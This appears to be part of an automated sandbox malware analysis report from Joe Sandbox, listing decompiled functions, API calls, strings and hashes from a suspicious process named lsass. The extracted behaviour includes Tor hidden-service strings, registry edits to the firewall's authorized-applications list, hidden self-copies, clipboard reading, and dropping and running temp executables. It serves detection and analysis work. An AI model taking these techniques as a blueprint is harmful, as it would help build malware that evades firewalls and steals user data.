_longjmp.LIBVCRUNTIMED ref: 0077669C
GetLastError.KERNEL32 ref: 0077672A
GetLastError.KERNEL32 ref: 00776737
GetLastError.KERNEL32 ref: 0077674E
GetLastError.KERNEL32 ref: 00776773

Strings

gzip, xrefs: 00776332
%s%s%sConnection: closeAccept-Encoding: gzip, xrefs: 00776345
WSx, xrefs: 00776489, 0077648F
Proxy-Connection: close, xrefs: 00776358
deflate, xrefs: 0077631F
SSx, xrefs: 00776441

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: ErrorLast$lstrlen$_longjmpmemmove
String ID: %s%s%sConnection: closeAccept-Encoding: gzip$Proxy-Connection: close$SSx$WSx$deflate$gzip
API String ID: 3717562076-3900119746
Opcode ID: 7a2b114e92a2b3a61f1776a12d0fa8ecee327598d3277d15a1bd49e48a8c8243
Instruction ID: 4020a393b1289b2c7d3fb1ed827540c740faefeaec9054ccb74c850200399568
Opcode Fuzzy Hash: 7a2b114e92a2b3a61f1776a12d0fa8ecee327598d3277d15a1bd49e48a8c8243
Instruction Fuzzy Hash: B5E16BB5900258DFDF18DFA0CC49BEEB774BB44384F148198F649AB285D7B89A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00782D0F Relevance: 28.0, APIs: 11, Strings: 5, Instructions: 47
filesleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000001F4), ref: 00782D30
FindWindowA.USER32(w4tw84thw4h8th8w4h8t,00000000), ref: 00782D63
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782D81
Sleep.KERNEL32(000007D0), ref: 00782D8C
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782D97
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4yw4t4tw4twyw4y), ref: 00782DA7
Sleep.KERNEL32(000007D0), ref: 00782DD9
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00782DE9
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00782DF9
Sleep.KERNEL32(00000FA0), ref: 00782E04
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782E0F
Sleep.KERNEL32(000003E8), ref: 00782E1C
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00782E27
Sleep.KERNEL32(00001770), ref: 00782E32
PathFileExistsW.SHLWAPI(w4tw4yw4yw4tw4t), ref: 0078347C
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 0078348F
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 007834C6
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007834D1
Sleep.KERNEL32(00001388), ref: 007834DE
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 007834EB
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00783505
SetForegroundWindow.USER32(?), ref: 00783512
SetFocus.USER32(?), ref: 0078351F
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 0078352A
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 0078353A
Sleep.KERNEL32(000000C8), ref: 00783545
CloseWindow.USER32(?), ref: 00783552
Sleep.KERNEL32(00000FA0), ref: 0078355D
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 0078358F
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 0078359F
Sleep.KERNEL32(000001F4), ref: 007835C0
memset.MSVCRT ref: 007835D4
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 007835F6
rand.MSVCRT ref: 007835FC
rand.MSVCRT ref: 00783610
rand.MSVCRT ref: 00783624
wsprintfW.USER32 ref: 0078364B
wsprintfW.USER32 ref: 0078366E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00783680
Sleep.KERNEL32(000003E8), ref: 00783693
CopyFileW.KERNEL32(?,?,00000000), ref: 007836A9
Sleep.KERNEL32(000003E8), ref: 007836BC
wsprintfW.USER32 ref: 007836DC
SetFileAttributesW.KERNEL32(?,00000007), ref: 007836EE
SetFileAttributesW.KERNEL32(?,00000007), ref: 007836FD
RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 0078371B
wcslen.MSVCRT ref: 0078372C
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000000A), ref: 00783852
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0078387B
RegSetValueExA.ADVAPI32(?,00000000,?,00000004,?,?,?,?,?,?,?,?,?,0000000A), ref: 007838AD
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 007838D6
RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0000000A), ref: 0078390B
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 00783934
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 00783977
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 00783998
RegCloseKey.ADVAPI32(?,?,?,?,00000000,000F003F,?), ref: 007839A5

Strings

f5d4s54s4sds5d5d5d, xrefs: 00782D7C, 00782D92, 00782E0A
w4yw4t4tw4twyw4y, xrefs: 00782D9D, 00782DA2, 00782DEF
w4tw84thw4h8th8w4h8t, xrefs: 00782D5E
w4tw4yw4yw4tw4t, xrefs: 00782DE4
e5u5eue5ue5ue5ue5u, xrefs: 00782DDF, 00782DF4

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: File$Sleep$Delete$Move$OpenWindow$Valuerandwsprintf$AttributesCloseCreateFind$CopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
String ID: e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4yw4t4tw4twyw4y
API String ID: 1434077179-1752865879
Opcode ID: f6d8c32754a935c13cebeedb8aaf7ae6cb92e142bfca79536c6deed6312bfc59
Instruction ID: b03b574f5a274e05d37661f0ca5cd485b1f74b41d56b0262b51a18ca52f19205
Opcode Fuzzy Hash: f6d8c32754a935c13cebeedb8aaf7ae6cb92e142bfca79536c6deed6312bfc59
Instruction Fuzzy Hash: 961119B0AC0658EFD714AB90DC4EBEC7AB1BB04B06F24D4C5E24A65191C7BC0AC4CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0077CAD0 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 401
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

_longjmp.LIBVCRUNTIMED ref: 0077CBD8
task.LIBCPMTD ref: 0077D02F

Part of subcall function 00773830: lstrlenA.KERNEL32(00000000), ref: 00773862
Part of subcall function 00773830: lstrlenA.KERNEL32(?), ref: 0077387E

lstrlenA.KERNEL32(?,?,00000014,00000020,?,?,?,?,?,?,?,?,00000000), ref: 0077CEF0
memmove.MSVCRT ref: 0077CFC0

Strings

-----END MESSAGE-----, xrefs: 0077CB3F
<, xrefs: 0077CF41
onion-port , xrefs: 0077CB78
-----END RSA PUBLIC KEY-----, xrefs: 0077CBA4
secret-id-part , xrefs: 0077CB03
introduction-points-----BEGIN MESSAGE-----, xrefs: 0077CB2C
protocol-versions , xrefs: 0077CB16
introduction-point , xrefs: 0077CB52
onion-key, xrefs: 0077CB8E
service-key, xrefs: 0077CBBA
ip-address , xrefs: 0077CB65

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlen$memmove$_longjmptask
String ID: -----END MESSAGE-----$-----END RSA PUBLIC KEY-----$<$introduction-point $introduction-points-----BEGIN MESSAGE-----$ip-address $onion-key$onion-port $protocol-versions $secret-id-part $service-key
API String ID: 3796934367-2400399560
Opcode ID: 17a281289452b5d56a962dbb95684c49e64c91c2da0f4b92ea99cc6f563ea004
Instruction ID: 21b4e2222f945e2bff0938d5b3712b57e37d5c51c4e98a10c3b0f27a83d0d835
Opcode Fuzzy Hash: 17a281289452b5d56a962dbb95684c49e64c91c2da0f4b92ea99cc6f563ea004
Instruction Fuzzy Hash: 0BE17AF2A40318AADF24DB54DC46FEE7379AF48700F548198F6096B181EB75AB44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00780080 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62sleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0078008E
memset.MSVCRT ref: 0078009E
CreateProcessW.KERNEL32(00000000,00780771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007800D7
Sleep.KERNEL32(000003E8), ref: 007800E7
Sleep.KERNEL32(000003E8), ref: 007800F6
ShellExecuteW.SHELL32(00000000,open,00780771,00000000,00000000,00000000), ref: 0078010D
Sleep.KERNEL32(000003E8), ref: 00780127

Strings

, xrefs: 0078011C
D, xrefs: 007800A6
open, xrefs: 00780106

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Sleep$memset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 4117032385-2182757814
Opcode ID: 31607115a72eb64611de84d76b1892aa5f5e3be3afc3e2bc09d11c0bf9d47b8d
Instruction ID: dfe42f4833aafde24491d2900f67cc11e43382e9e973f4b1e396600b4c93806f
Opcode Fuzzy Hash: 31607115a72eb64611de84d76b1892aa5f5e3be3afc3e2bc09d11c0bf9d47b8d
Instruction Fuzzy Hash: 7E1142B1EC4308BBEB10DB90DD4AF9D7778AB14B01F204115F7096E1C0DAF96A04CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00774AC0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 00774220: GetLastError.KERNEL32 ref: 00774264
Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 007742FE
Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 0077430E
Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 0077431E

freeaddrinfo.WS2_32(?,00000004,00000009), ref: 00774C67

Part of subcall function 007749C0: socket.WS2_32(?,?,?), ref: 00774A1E
Part of subcall function 007749C0: connect.WS2_32(000000FF,?,?), ref: 00774A48
Part of subcall function 007749C0: freeaddrinfo.WS2_32(?), ref: 00774AA5

Strings

, xrefs: 00774D6E
, xrefs: 00774B5D
CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s, xrefs: 00774F13
CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s, xrefs: 00774D61

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: FreeGlobal$freeaddrinfo$ErrorLastconnectsocket
String ID: $ $CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s$CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s
API String ID: 3188732148-200375032
Opcode ID: 2d4e10b69fe4da918ec2d470402993b9c2d76502b3604b64076edd609f85d58a
Instruction ID: 5c973d5e2323d22c337040c3ce83e3b5fc6784204237ff7d7a4c648a7ba4873a
Opcode Fuzzy Hash: 2d4e10b69fe4da918ec2d470402993b9c2d76502b3604b64076edd609f85d58a
Instruction Fuzzy Hash: B3F1C271A002689BDF28DB65DC45BFAB3B9AB44344F04C4D9B14DA7181DBB89F84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007811E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94sleepfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 00781245
rand.MSVCRT ref: 0078126E
rand.MSVCRT ref: 00781282
wsprintfW.USER32 ref: 007812A9

Part of subcall function 00781130: CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 00781153
Part of subcall function 00781130: SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0078116C
Part of subcall function 00781130: WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00781198
Part of subcall function 00781130: CloseHandle.KERNEL32(000000FF), ref: 007811CD

Sleep.KERNEL32(000003E8), ref: 007812ED

Part of subcall function 0077FE60: CryptImportKey.ADVAPI32(00000000,00785940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FE8A
Part of subcall function 0077FE60: CreateFileW.KERNEL32(00780750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FEAB
Part of subcall function 0077FE60: GetFileSize.KERNEL32(000000FF,00000000), ref: 0077FEC4
Part of subcall function 0077FE60: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 0077FEE5
Part of subcall function 0077FE60: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0077FF04
Part of subcall function 0077FE60: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 0077FF56
Part of subcall function 0077FE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0077FF8D
Part of subcall function 0077FE60: HeapAlloc.KERNEL32(00000000), ref: 0077FF94

Sleep.KERNEL32(000003E8), ref: 0078130E

Part of subcall function 00780080: memset.MSVCRT ref: 0078008E
Part of subcall function 00780080: memset.MSVCRT ref: 0078009E
Part of subcall function 00780080: CreateProcessW.KERNEL32(00000000,00780771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007800D7
Part of subcall function 00780080: Sleep.KERNEL32(000003E8), ref: 007800E7

DeleteFileW.KERNEL32(?), ref: 0078132C

Strings

>x, xrefs: 0078121D, 0078122E
%ls\%d%d.exe, xrefs: 0078129D

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: File$Create$Sleep$CryptHeapProcessmemsetrand$AllocCloseDeleteHandleHashImportMappingPathPointerSizeTempViewWritewsprintf
String ID: %ls\%d%d.exe$>x
API String ID: 1034425663-2732872938
Opcode ID: 0ff99068beb328ab2a0e19d29f050f68ade358f90087370c936e2de331345a53
Instruction ID: af6f3e7c74ab54b60e8d65a7c87556d28c7163ebb25bade55ae481a616066364
Opcode Fuzzy Hash: 0ff99068beb328ab2a0e19d29f050f68ade358f90087370c936e2de331345a53
Instruction Fuzzy Hash: AD31C9B1A8011DDBCB14EB50DC89FEE7379BF44304F4085D8F50D96581EA789E418F65

Uniqueness

Uniqueness Score: -1.00%

Function 0077DBE0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 443stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

Part of subcall function 007770D0: lstrlenA.KERNEL32(0077DC70,?,0077DC70,?,00000040,00000000), ref: 007770DA

lstrlenA.KERNEL32(?), ref: 0077DD1F
memmove.MSVCRT ref: 0077DEB6

Part of subcall function 00777190: lstrlenA.KERNEL32(?,?,?,0077DC8D,?,?,?,00000040,00000000), ref: 00777198

memmove.MSVCRT ref: 0077E24B
memmove.MSVCRT ref: 0077E2B3
memmove.MSVCRT ref: 0077E2F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 0077E333

Strings

@, xrefs: 0077E0BA
, xrefs: 0077DECA

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: memmove$lstrlen$CompletionCriticalEnterPostQueuedSectionStatus
String ID: $@
API String ID: 2473233352-1077428164
Opcode ID: fccd7a1aa340e2eba8e30a185715529edb3c199833ecc2316b0f9a6b2bbabb14
Instruction ID: 62f682654bcf0c3720862967e68679a7cf22b046e1e808d5697ecaac0fee4993
Opcode Fuzzy Hash: fccd7a1aa340e2eba8e30a185715529edb3c199833ecc2316b0f9a6b2bbabb14
Instruction Fuzzy Hash: 11225170B00229AFDF2ACB11D8A5AA9B77AAF54344F14C5E9D00D5B381DB7A9F85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0077FCD0 Relevance: 13.5, APIs: 9, Instructions: 47clipboardsleepCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0077FCD8
GetClipboardData.USER32(00000001), ref: 0077FCE4
GlobalLock.KERNEL32(00000000), ref: 0077FCF7
GlobalUnlock.KERNEL32(00000000), ref: 0077FD0A
GetClipboardData.USER32(0000000D), ref: 0077FD1E
GlobalLock.KERNEL32(00000000), ref: 0077FD31
GlobalUnlock.KERNEL32(00000000), ref: 0077FD44
CloseClipboard.USER32 ref: 0077FD56
Sleep.KERNEL32(000000C8), ref: 0077FD61

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$CloseOpenSleep
String ID:
API String ID: 4265195717-0
Opcode ID: 41c3d401f8912a578bee66352d2a205bcf12475677b3afe411e553c0019a549b
Instruction ID: 4c0599e80b11bfe6584a2d6ccb874e690690f89764556f28177e8130a9d43fab
Opcode Fuzzy Hash: 41c3d401f8912a578bee66352d2a205bcf12475677b3afe411e553c0019a549b
Instruction Fuzzy Hash: 36113CB8A40708EFDB10AFF0DA4CB8D7BB4BB04301F24C564E50A972A0DB7C9A84DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0077837B Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 292COMMON

Download Yara Rule

APIs

inet_ntop.WS2_32(00000002,?,?,00000080), ref: 007783E6

Strings

<, xrefs: 007787C2
s , xrefs: 0077857F
p , xrefs: 0077854B
r , xrefs: 007784B8
r , xrefs: 007784EC

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: inet_ntop
String ID: p $r $r $s $<
API String ID: 448242623-3079122765
Opcode ID: 8c9c6af6f4c6f9b485a317a2c5cd88dc67981b1da1a87e5f3db10fc1020d5596
Instruction ID: 2b46be6109ac88aa28ad8a778e4b08ecf8d69cc437bea9d548e5af101ea14cba
Opcode Fuzzy Hash: 8c9c6af6f4c6f9b485a317a2c5cd88dc67981b1da1a87e5f3db10fc1020d5596
Instruction Fuzzy Hash: 9ED160719402699FDF64CBA0CC48FEEB7B9AF44340F1485D9E20DA6241DB789E84CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0077B110 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00773330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00773370
Part of subcall function 00773330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 0077338E
Part of subcall function 00773330: Sleep.KERNEL32(000007D0), ref: 007733A2

memmove.MSVCRT ref: 0077B14F
memmove.MSVCRT ref: 0077B16D
memmove.MSVCRT ref: 0077B1A2

Part of subcall function 007723C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,0077B263,?,00000000,00000056,00000080), ref: 007723E2

memmove.MSVCRT ref: 0077B22A
memmove.MSVCRT ref: 0077B241
memmove.MSVCRT ref: 0077B2A7

Strings

V, xrefs: 0077B190
F, xrefs: 0077B1D1

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: memmove$AllocHeap$CryptEncryptSleep
String ID: F$V
API String ID: 3676980526-4172692743
Opcode ID: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
Instruction ID: bd07a51ac9aeae4c95e17463f371a833c9c63272a723bb4b12ce7be23e161ac8
Opcode Fuzzy Hash: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
Instruction Fuzzy Hash: B7514FB2D00209ABDF04DBD4DC86FEFB779AF58300F048518F519A7242E779AA15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00777650 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

lstrlenA.KERNEL32(?,00000000), ref: 007777A9

Strings

HTTP/1.0 504 Gateway Timeout, xrefs: 007776BB
HTTP/1.0 502 Bad Gateway, xrefs: 007776A8
HTTP/1.0 200 OK, xrefs: 00777669
HTTP/1.0 %s, xrefs: 007776E4
HTTP/1.0 500 Internal Server Error, xrefs: 007776CE
HTTP/1.0 404 Not Found, xrefs: 0077767C
HTTP/1.0 403 Forbidden, xrefs: 00777692

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlenmemmove
String ID: HTTP/1.0 %s$HTTP/1.0 200 OK$HTTP/1.0 403 Forbidden$HTTP/1.0 404 Not Found$HTTP/1.0 500 Internal Server Error$HTTP/1.0 502 Bad Gateway$HTTP/1.0 504 Gateway Timeout
API String ID: 4100021496-2506370377
Opcode ID: 4bcc6986c26109381dae8e01a0bb8ca6e972aaa685dcb8a641ad5a4ef54f6b0c
Instruction ID: 9e3e1a371ba081adfd35451062718b50eb68f3b1acabedd81f82e0d2d02177c8
Opcode Fuzzy Hash: 4bcc6986c26109381dae8e01a0bb8ca6e972aaa685dcb8a641ad5a4ef54f6b0c
Instruction Fuzzy Hash: 8A419EB4948358EADF28DB50DC41FEDB774AB08344F44C0D9E90DA6282E7B41B88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0077A8E0 Relevance: 10.8, APIs: 7, Instructions: 294networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 0077A919
htons.WS2_32(?), ref: 0077A936
htonl.WS2_32(?), ref: 0077A993
memmove.MSVCRT ref: 0077AA02
memmove.MSVCRT ref: 0077AA39
memmove.MSVCRT ref: 0077AACC

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: memmove$htons$htonl
String ID:
API String ID: 2070112683-0
Opcode ID: 72ff0c1ad30a6827b633005abfa44909f99d5b8abc6157dba166dfed7b51870a
Instruction ID: 58d83abf63cbb310048093e54a7aa6094b1fe640fed48b574feaa954cdb38bf0
Opcode Fuzzy Hash: 72ff0c1ad30a6827b633005abfa44909f99d5b8abc6157dba166dfed7b51870a
